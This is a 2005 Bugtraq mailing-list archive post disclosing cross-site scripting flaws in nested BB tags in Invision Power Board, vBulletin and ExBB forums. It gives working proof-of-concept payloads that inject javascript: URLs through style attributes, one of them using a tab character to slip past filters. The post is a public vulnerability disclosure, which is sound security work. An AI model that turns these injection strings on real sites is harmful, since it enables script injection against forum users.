Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

XSS in the nested BB tag in many forum
From: "pigrelax" <pigrelax () yandex ru>
Date: Sat, 15 Jan 2005 16:13:38 +0300
XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s () wew ew]mailto:assss () wew ew] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php

  By Date           By Thread  

Current thread:
  • XSS in the nested BB tag in many forum pigrelax (Jan 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]